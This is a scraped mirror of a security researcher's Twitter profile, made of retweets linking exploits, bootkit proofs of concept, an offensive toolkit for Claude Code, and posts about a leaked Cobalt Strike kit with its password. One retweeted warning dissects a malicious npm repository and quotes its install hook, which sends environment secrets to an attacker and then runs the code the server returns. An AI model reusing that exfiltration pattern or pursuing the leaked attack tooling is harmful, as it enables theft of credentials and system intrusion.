Sotwe logo Sotwe logo
KernelDBG's profile image

FFE4

@KernelDBG

I'm a virus analyst focus on Windows Security Research,Exploit Development
Joined July 2016
3.1K Following
311 Followers
2.5K Posts
KernelDBG  retweeted
calif_io's profile image
Calif Verified account @calif_io
RedSun: Exploiting Windows Defender's Remediation Workflow for Local Privilege Escalation Just showing some appreciation for @ChaoticEclipse0's excellent work. Hopefully this won't get us banned! https://t.co/Z4zbaa2Jcd
1
163
46
78
16K
KernelDBG  retweeted
portbuster1337's profile image
portbuster @portbuster1337
Added the new CIFSwitch linux LPE exploit into lpe-toolkit btw https://t.co/BmdCcmBkWK
0
41
13
24
2K
KernelDBG  retweeted
jonasLyk's profile image
Jonas L Verified account @jonasLyk
@ibuildthecloud How else would you do this? mkdir wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D} cd "wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D}" copy "%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk" target.lnk
jonasLyk's tweet photo. @ibuildthecloud How else would you do this? mkdir wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D} cd "wtf.{0AFACED1-E828-11D1-9187-B532F1E9575D}" copy "%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk" target.lnk https://t.co/SozbEVU3wU
0
48
5
26
4K
KernelDBG  retweeted
theluemmel's profile image
LuemmelSec @theluemmel
https://t.co/dIf6xCVnf5
2
126
37
74
10K

Who to follow

tuantmb's profile image
Tuan Tr.
@tuantmb
computer geek
veil_ivy's profile image
Veil
@veil_ivy
Andy6888's profile image
Andy
@Andy6888
Reverse Engineer. Security Researcher.
KernelDBG  retweeted
sakaijjang's profile image
Sakai Verified account @sakaijjang
Kimsuky 바이낸스(Binance) 사칭 해서 암호화폐 사용을 노리는 악성코드-BN_FIU_2026.chm https://t.co/VybAVkFIEp #김수키 #Kimsuky #암호화폐
0
4
3
2
511
KernelDBG  retweeted
vedovelli74's profile image
Fabio Vedovelli Verified account @vedovelli74
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `https://t.co/EHtEFLu5Yg(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
vedovelli74's tweet photo. ⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe. Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar. Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente. 🎯 Payload 1 — dispara no `npm install` O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um: `https://t.co/EHtEFLu5Yg(url, { ...process.env })` Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser. A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
31
1K
323
696
676K
KernelDBG  retweeted
ReneRobichaud's profile image
Rene Robichaud Verified account @ReneRobichaud
Surviving a LockBit Ransomware Attack: The ROI of Visibility https://t.co/nAYTT1gNLJ
0
6
3
2
234
KernelDBG  retweeted
_CryptoCat's profile image
CryptoCat @_CryptoCat
Found an unpatched RCE in Gogs 👀 Any authenticated user can get code execution on the server through argument injection into git rebase. Full @rapid7 writeup + @metasploit module available now! 🔗https://t.co/VAYLxZ6o1b
_CryptoCat's tweet photo. Found an unpatched RCE in Gogs 👀 Any authenticated user can get code execution on the server through argument injection into git rebase. Full @rapid7 writeup + @metasploit module available now! 🔗https://t.co/VAYLxZ6o1b https://t.co/8YLVatavj4
1
171
32
63
15K
KernelDBG  retweeted
0x0Huda's profile image
ɐpnH Verified account @0x0Huda
UEFI bootkit PoC. Firmware hooks + boot hijack + pre-OS persistence. Boots before Windows, owns Ring0. First public framework for APT emulation. https://t.co/RBJuW6BPQR
2
175
55
145
7K
KernelDBG  retweeted
YogSoth0's profile image
YogSotho Verified account @YogSoth0
@Pirat_Nation https://t.co/Qz655uC8yF Just in case Gitlab decides to nuke his work
3
59
3
31
8K
KernelDBG  retweeted
DFIR_Radar's profile image
DFIR Radar Verified account @DFIR_Radar
North Korean 🇰🇵 Lazarus APT deploys RemotePE, a fileless RAT that runs entirely in memory using DPAPI encryption keying. Fox-IT analysis shows active development from 2023-2024 with manual C2 operator approval during KST hours. #DFIR_Radar
DFIR_Radar's tweet photo. North Korean 🇰🇵 Lazarus APT deploys RemotePE, a fileless RAT that runs entirely in memory using DPAPI encryption keying. Fox-IT analysis shows active development from 2023-2024 with manual C2 operator approval during KST hours. #DFIR_Radar https://t.co/E6jVbLaTYD
1
11
2
1
439
KernelDBG  retweeted
0x0Huda's profile image
ɐpnH Verified account @0x0Huda
Petya-style bootkit PoC. Raw Assembly for MBR hijack + C/C++ payload. Boots, installs, and owns the system pre-OS. https://t.co/fKY3HroJXz
0x0Huda's tweet photo. Petya-style bootkit PoC. Raw Assembly for MBR hijack + C/C++ payload. Boots, installs, and owns the system pre-OS. https://t.co/fKY3HroJXz https://t.co/JkwyCYcdjW
2
218
53
176
19K
KernelDBG  retweeted
r1cksec's profile image
r1cksec @r1cksec
A post about how Windows Named Pipes can become an attack surface when their ACLs are too permissive or when pipe creation flags are misused https://t.co/m3KnfqXNfk #infosec #cybersecurity #redteam #pentest #windows
1
52
13
44
3K
KernelDBG  retweeted
askardyuss's profile image
Askar @askardyuss
Same technique (VHDX + RLO + DLL sideloading) was used to execute the variant of malicious DLL (MD5 68088E5032370006560FF1035B3F2E72).
askardyuss's tweet photo. Same technique (VHDX + RLO + DLL sideloading) was used to execute the variant of malicious DLL (MD5 68088E5032370006560FF1035B3F2E72). https://t.co/cFlPqe9a79
0
91
22
54
15K
KernelDBG  retweeted
pentest_swissky's profile image
Swissky Verified account @pentest_swissky
RedSun: How Windows Defender's Remediation Became a SYSTEM File Write https://t.co/8gB8yqpEJx
0
86
30
53
7K
KernelDBG  retweeted
Dinosn's profile image
Nicolas Krassas Verified account @Dinosn
Offensive security toolkit for Claude Code covering red team, exploit dev, AD attacks, EDR bypass, mobile pentest https://t.co/BkwoSBEFew
5
744
154
821
32K
KernelDBG  retweeted
5mukx's profile image
Smukx.E Verified account @5mukx
An unexpected journey into Microsoft Defender's signature World Blog:- https://t.co/17xtrUXk1A #windows #defender #reverse
5mukx's tweet photo. An unexpected journey into Microsoft Defender's signature World Blog:- https://t.co/17xtrUXk1A #windows #defender #reverse https://t.co/U3kLGXYjxQ
3
275
56
234
16K
KernelDBG  retweeted
akaclandestine's profile image
Clandestine Verified account @akaclandestine
GitHub - orinimron123/CVE-2026-40369-EXPLOIT: Full exploit code for CVE-2026-40369 - A Windows kernel arbitrary write vulnerability that allows browser sandbox escape from all browsers render process sandbox · GitHub https://t.co/12eWzOQNR8
1
181
43
118
38K
KernelDBG's profile image
FFE4 @KernelDBG
just found cobaltstrike 4.12 with arsenal-kit20251122.tgz but protect with password 4eebbfab228cc1a2e5f2569fbbe6c0664a45e42773b6ead4e65d539864fd7b9d
KernelDBG's tweet photo. just found cobaltstrike 4.12 with arsenal-kit20251122.tgz but protect with password 4eebbfab228cc1a2e5f2569fbbe6c0664a45e42773b6ead4e65d539864fd7b9d https://t.co/yfq1KbrJn9
0
0
0
0
87
KernelDBG's profile image
FFE4 @KernelDBG
just found Arsenal Kit 20251122 version leaked d6f857c4e66be26343cbff27a55a057ff9f55d3c99e2e2048701e210200a0590
KernelDBG's tweet photo. just found Arsenal Kit 20251122 version leaked d6f857c4e66be26343cbff27a55a057ff9f55d3c99e2e2048701e210200a0590 https://t.co/GF7AZMa1f2
0
13
2
14
2K

Last Seen Users on Sotwe

by_klasik's profile image
Uzun boylu ve beyaz tenli türbanlılar
Seen from Turkey
bobahobah's profile image
Boba Hobah
Seen from Italy
WomenOnTop9000's profile image
Wot Only
Seen from Indonesia
GoddessLolaaBih's profile image
Pegging Mama 🦂 Verified account
Seen from India
BekoAjo's profile image
Ngintip mandi
Seen from Indonesia
Igris1n's profile image
ALONE GIRL
Seen from India
Ailin_1212's profile image
Ailin🌻
Seen from Israel
HelloHarleyRose's profile image
Harley Rose 🌹
Seen from United States
Aliii16081155's profile image
türbanlı delisi
Seen from Turkey
lymn177999's profile image
متحررين يمني
Seen from United States

Trends for you

1
Welker
Under 10K tweets
2
Stacey King
Under 10K tweets
3
#XBOXShowcase
Under 10K tweets
4
Zverev
Under 10K tweets
5
Persona 4
Under 10K tweets
6
State of Decay 3
Under 10K tweets
7
Merry Christmas
Under 10K tweets
8
Fable
Under 10K tweets
9
#RTXPowersPlays
Under 10K tweets
10
#MonacoGP
Under 10K tweets

Most Popular Users

elonmusk's profile image
1
Elon Musk Verified account
@elonmusk
240.2M followers
barackobama's profile image
2
Barack Obama Verified account
@barackobama
119.3M followers
realdonaldtrump's profile image
3
Donald J. Trump Verified account
@realdonaldtrump
111.6M followers
cristiano's profile image
4
Cristiano Ronaldo Verified account
@cristiano
109M followers
narendramodi's profile image
5
Narendra Modi Verified account
@narendramodi
107M followers
rihanna's profile image
6
Rihanna Verified account
@rihanna
97.3M followers
nasa's profile image
7
NASA Verified account
@nasa
92.1M followers
justinbieber's profile image
8
Justin Bieber Verified account
@justinbieber
90.6M followers
katyperry's profile image
9
KATY PERRY Verified account
@katyperry
86.9M followers
taylorswift13's profile image
10
Taylor Swift Verified account
@taylorswift13
80.7M followers
ladygaga's profile image
11
Lady Gaga Verified account
@ladygaga
72.2M followers
kimkardashian's profile image
12
Kim Kardashian Verified account
@kimkardashian
69.4M followers
youtube's profile image
13
YouTube Verified account
@youtube
68.6M followers
imvkohli's profile image
14
Virat Kohli Verified account
@imvkohli
68.6M followers
billgates's profile image
15
Bill Gates Verified account
@billgates
63.4M followers
theellenshow's profile image
16
The Ellen Show
@theellenshow
62.5M followers
cnn's profile image
17
CNN Verified account
@cnn
61.9M followers
neymarjr's profile image
18
Neymar Jr Verified account
@neymarjr
61.2M followers
x's profile image
19
X Verified account
@x
60.9M followers
selenagomez's profile image
20
Selena Gomez Verified account
@selenagomez
59.9M followers